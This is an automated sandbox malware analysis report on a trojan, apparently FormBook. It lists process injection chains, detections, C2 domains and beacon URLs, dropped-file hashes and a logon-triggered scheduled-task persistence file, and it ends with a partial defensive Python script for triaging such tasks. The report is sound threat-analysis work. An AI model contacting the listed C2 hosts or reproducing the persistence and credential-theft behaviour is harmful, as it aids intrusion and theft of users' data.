  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  Started: schtasks.exe; zdDlscHlw.exe (child)

C6Abn5cBei.exe (child)
  Signatures: Maps a DLL or memory area into another process
  Injected into: mDeEygzSIDmBTP.exe

powershell.exe (first)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe; WmiPrvSE.exe

powershell.exe (second)
  Started: conhost.exe

schtasks.exe (from C6Abn5cBei.exe)
  Started: conhost.exe

schtasks.exe (from zdDlscHlw.exe)
  Started: conhost.exe

mDeEygzSIDmBTP.exe (injected by C6Abn5cBei.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  Started: regini.exe

regini.exe
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  Injected into: mDeEygzSIDmBTP.exe
  Started: firefox.exe

mDeEygzSIDmBTP.exe (injected by regini.exe)
  DNS/IP: hm35s.top 154.23.184.95, ports 49988, 49989, 49990, COGENT-174US, United States; www.cg19g5.pro 154.88.22.107, ports 49906, 49924, 49937, CNSERVERSUS, Seychelles; 2 other IPs or domains
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
C6Abn5cBei.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
C6Abn5cBei.exe | 65% | Virustotal |
C6Abn5cBei.exe | 100% | Avira | HEUR/AGEN.1309499
C6Abn5cBei.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\zdDlscHlw.exe | 100% | Avira | HEUR/AGEN.1309499
C:\Users\user\AppData\Roaming\zdDlscHlw.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\zdDlscHlw.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://www.hm35s.top/ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDx | 0% | Avira URL Cloud | safe
http://www.vayui.top/7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDx | 0% | Avira URL Cloud | safe
http://www.cg19g5.pro/63n1/ | 0% | Avira URL Cloud | safe
http://www.hm35s.top/ebw6/ | 0% | Avira URL Cloud | safe
http://www.327531.buzz/iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDx | 0% | Avira URL Cloud | safe
http://www.cg19g5.pro/63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA== | 0% | Avira URL Cloud | safe
http://www.hm35s.top | 0% | Avira URL Cloud | safe
http://www.327531.buzz/iodk/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.vayui.top | 172.67.145.234 | true | false | | high
hm35s.top | 154.23.184.95 | true | true | | unknown
www.327531.buzz | 43.199.54.158 | true | false | | high
www.cg19g5.pro | 154.88.22.107 | true | true | | unknown
www.hm35s.top | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.cg19g5.pro/63n1/ | true | Avira URL Cloud: safe | unknown
http://www.vayui.top/7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDx | true | Avira URL Cloud: safe | unknown
http://www.hm35s.top/ebw6/ | true | Avira URL Cloud: safe | unknown
http://www.327531.buzz/iodk/ | true | Avira URL Cloud: safe | unknown
http://www.cg19g5.pro/63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA== | true | Avira URL Cloud: safe | unknown
http://www.hm35s.top/ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDx | true | Avira URL Cloud: safe | unknown
http://www.327531.buzz/iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDx | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | C6Abn5cBei.exe, 00000000.00000002.1504108330.0000000002621000.00000004.00000800.00020000.00000000.sdmp, zdDlscHlw.exe, 0000000A.00000002.1800123427.00000000031E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.hm35s.top | mDeEygzSIDmBTP.exe, 00000014.00000002.2690431464.0000000004B64000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.145.234 | www.vayui.top | United States | 13335 | CLOUDFLARENETUS | false
43.199.54.158 | www.327531.buzz | Japan | 4249 | LILLY-ASUS | false
154.88.22.107 | www.cg19g5.pro | Seychelles | 40065 | CNSERVERSUS | true
154.23.184.95 | hm35s.top | United States | 174 | COGENT-174US | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588774
Start date and time: 2025-01-11 05:19:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: C6Abn5cBei.exe (renamed because the original name is a hash value)
Original Sample Name: 65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/16@4/4
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 153
• Number of non-executed functions: 309
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.23.242.162, 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mDeEygzSIDmBTP.exe, PID 6856 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:21:02 | Task Scheduler | Run new task: zdDlscHlw path: C:\Users\user\AppData\Roaming\zdDlscHlw.exe
23:20:58 | API Interceptor | 1x Sleep call for process: C6Abn5cBei.exe modified
23:20:59 | API Interceptor | 52x Sleep call for process: powershell.exe modified
23:21:10 | API Interceptor | 1x Sleep call for process: zdDlscHlw.exe modified
23:22:13 | API Interceptor | 894706x Sleep call for process: regini.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.145.234 | RFQ_P.O.1212024.scr | malicious | FormBook | www.vayui.top/ge5i/
172.67.145.234 | NEW.RFQ00876.pdf.exe | malicious | FormBook | www.vayui.top/ge5i/
172.67.145.234 | ek8LkB2Cgo.exe | malicious | FormBook | www.vayui.top/t4v0/
172.67.145.234 | Latest advice payment.exe | malicious | FormBook | www.vayui.top/vg0z/
172.67.145.234 | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | www.vayui.top/4twy/
172.67.145.234 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.vayui.top/vg0z/
172.67.145.234 | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | www.vayui.top/4twy/
172.67.145.234 | purchase Order.exe | malicious | FormBook | www.vayui.top/vg0z/
172.67.145.234 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.vayui.top/vg0z/
43.199.54.158 | RFQ3978 39793980.pdf.exe | malicious | FormBook | www.327531.buzz/iodk/
43.199.54.158 | ek8LkB2Cgo.exe | malicious | FormBook | www.327531.buzz/iyce/
43.199.54.158 | Order MEI PO IM202411484.exe | malicious | FormBook | www.327531.buzz/zoqm/
43.199.54.158 | IETC-24017.exe | malicious | FormBook, PureLog Stealer | www.327531.buzz/zoqm/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.327531.buzz | RFQ3978 39793980.pdf.exe | malicious | FormBook | 43.199.54.158
www.327531.buzz | ek8LkB2Cgo.exe | malicious | FormBook | 43.199.54.158
www.327531.buzz | Order MEI PO IM202411484.exe | malicious | FormBook | 43.199.54.158
www.327531.buzz | IETC-24017.exe | malicious | FormBook, PureLog Stealer | 43.199.54.158
www.cg19g5.pro | RFQ3978 39793980.pdf.exe | malicious | FormBook | 154.88.22.105
www.cg19g5.pro | SRT68.exe | malicious | FormBook | 154.88.22.105
www.cg19g5.pro | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 154.88.22.105
www.vayui.top | 1SxKeB4u0c.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | RFQ3978 39793980.pdf.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | RFQ_P.O.1212024.scr | malicious | FormBook | 172.67.145.234
www.vayui.top | NEW.RFQ00876.pdf.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ek8LkB2Cgo.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | PO 4110007694.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | Latest advice payment.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 172.67.145.234
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              LILLY-ASUS02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 43.205.198.29
                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                              • 43.205.198.29
                                              3.elfGet hashmaliciousUnknownBrowse
                                              • 40.189.252.194
                                              wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                              • 43.205.198.29
                                              frosty.arm.elf (Mirai) • 43.62.215.242
                                              frosty.spc.elf (Mirai) • 40.222.102.237
                                              frosty.x86.elf (Mirai) • 42.64.174.137
                                              frosty.sh4.elf (Mirai) • 40.58.230.116
                                              secured File__esperion.com.html (Phisher) • 43.153.232.152
                                              secured File__esperion.com.html (Phisher) • 43.152.64.207
                                              CNSERVERSUS
                                              1SxKeB4u0c.exe (FormBook) • 23.225.160.132
                                              suBpo1g13Q.exe (FormBook) • 23.225.159.42
                                              uG3I84bQEr.exe (FormBook) • 23.225.159.42
                                              aBEh0fsi2c.exe (FormBook) • 154.90.58.209
                                              QmBbqpEHu0.exe (FormBook) • 172.247.112.164
                                              arm.elf (Mirai) • 23.225.101.86
                                              spc.elf (Mirai) • 23.225.150.24
                                              sh4.elf (Mirai) • 23.225.149.53
                                              6.elf (Unknown) • 41.216.185.130
                                              3.elf (Unknown) • 41.216.185.178
                                              CLOUDFLARENETUS
                                              wZ6VEnOkie.exe (Snake Keylogger) • 104.21.80.1
                                              prlsqnzspl.exe (MassLogger RAT) • 104.21.48.1
                                              ZcshRk2lgh.exe (FormBook) • 104.21.15.100
                                              ydJaT4b5N8.exe (FormBook) • 104.21.48.1
                                              leUmNO9XPu.exe (HawkEye, MailPassView) • 104.19.223.79
                                              dZMT94YYwO.exe (MassLogger RAT) • 104.21.16.1
                                              ZeAX5i7cGB.exe (AgentTesla, PureLog Stealer) • 104.26.13.205
                                              jKqPSehspS.exe (AgentTesla) • 104.26.12.205
                                              BalphRTkPS.exe (FormBook) • 104.21.32.1
                                              A6AHI7Uk18.exe (AgentTesla) • 172.67.74.152
                                              COGENT-174US
                                              ZcshRk2lgh.exe (FormBook) • 154.23.184.95
                                              2976587-987347589.07.exe (Nitol, Xmrig) • 38.45.124.13
                                              BalphRTkPS.exe (FormBook) • 154.12.28.184
                                              02Eh1ah35H.exe (FormBook, GuLoader) • 154.23.178.231
                                              SpCuEoekPa.exe (FormBook) • 206.238.89.119
                                              suBpo1g13Q.exe (FormBook) • 154.23.178.231
                                              e47m9W6JGQ.exe (FormBook) • 154.23.178.231
                                              BcF3o0Egke.exe (FormBook) • 154.23.184.95
                                              5CTbduoXq4.exe (FormBook) • 38.46.13.54
                                              gKvjKMCUfq.exe (FormBook) • 38.181.21.178
                                              No context
                                              No context
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):2232
                                              Entropy (8bit):5.380192968514367
                                              Encrypted:false
                                              SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                                              MD5:E3EC01FAB7E327602A9550342FA73464
                                              SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                                              SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                                              SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\regini.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.1209886597424439
                                              Encrypted:false
                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                              Malicious:false
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Seven further copies of this AppLocker test file, identical in size (60 bytes), entropy and MD5/SHA1/SHA-256/SHA-512, are dropped by C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.
                                              Process:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1582
                                              Entropy (8bit):5.10757471506268
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTiv
                                              MD5:0B933E95D76D96AE6AF59101552D03B1
                                              SHA1:8FC2947CC4476B1332AB2219FF1E307B642AAB87
                                              SHA-256:DAF2077AB4E08EC99E003E0E4A3E36195036FC8278557581970DCEF5DEB8E8E5
                                              SHA-512:B9C15D068C3F925352052E53FDFD56635144B8DD24AED0DB43831497A47398F7C90840BB942960F1145F329EF19073A73899D66D5A5733C2640A3A021AEF4E9F
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1582
                                              Entropy (8bit):5.10757471506268
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTiv
                                              MD5:0B933E95D76D96AE6AF59101552D03B1
                                              SHA1:8FC2947CC4476B1332AB2219FF1E307B642AAB87
                                              SHA-256:DAF2077AB4E08EC99E003E0E4A3E36195036FC8278557581970DCEF5DEB8E8E5
                                              SHA-512:B9C15D068C3F925352052E53FDFD56635144B8DD24AED0DB43831497A47398F7C90840BB942960F1145F329EF19073A73899D66D5A5733C2640A3A021AEF4E9F
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
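The two task definitions above are the persistence artifact behind the "Uses schtasks.exe or at.exe to add and modify task schedules" signature: a LogonTrigger that is Enabled, an InteractiveToken principal at LeastPrivilege, and StartWhenAvailable set so a missed logon still fires the task. The report's preview is cut off before the <Actions> element, so the command the task runs is not visible here. The following is an added example, not Joe Sandbox code or anything dropped by the sample, showing how a responder would triage an exported task definition of this shape. The XML it parses is constructed from the fields visible in the preview; the Exec command (the AppData\Roaming path that appears as a process elsewhere in this report) is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed task definition modelled on the dropped XML above. The <Actions> block is an
# assumption: the report truncates the file before it, so the command is taken from the
# AppData\Roaming process path seen elsewhere in the report rather than from the file.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\zdDlscHlw.exe</Command>
    </Exec>
  </Actions>
</Task>"""

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Path fragments that mark a user-writable location; a scheduled action living there is
# the classic "drop to AppData, persist via task" pattern.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\",
                 "\\programdata\\", "\\desktop\\", "\\downloads\\")


def _text(node, path):
    """Text of the first child matching a namespaced path, or '' if absent."""
    el = node.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def assess_task(xml_text: str) -> list:
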